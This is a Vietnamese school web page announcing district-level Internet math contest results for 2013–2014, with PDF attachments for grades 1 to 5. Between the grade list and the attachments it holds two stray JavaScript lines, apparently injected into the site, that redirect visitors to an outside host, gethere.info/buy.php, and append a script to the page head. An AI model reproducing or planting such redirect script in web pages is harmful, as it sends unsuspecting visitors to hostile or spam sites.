Kết quả thi giải Toán qua Internet cấp Quận – Năm học: 2013 – 2014

05/04/2014 8:39 Chiều Phản hồi đã bị khóa

Kết quả thi giải Toán qua Internet cấp Quận – Năm học: 2013 – 2014

Khối1

Khối2

Khối3

Khối4

Khối5

location.replace(“http://gethere.info/buy.php”);

d.getElementsByTagName(‘head’)[0].appendChild(s);

Tệp đính kèm

Khoi1
File: Khoi1.pdf (197 kB)
Khối2
File: Khối2.pdf (196 kB)
Khối1
File: Khối1.pdf (197 kB)
Khối3
File: Khối3.pdf (195 kB)
Khối4
File: Khối4.pdf (195 kB)
Khối5
File: Khối5.pdf (195 kB)

Các phản hồi đã bị đóng lại bở quản trị.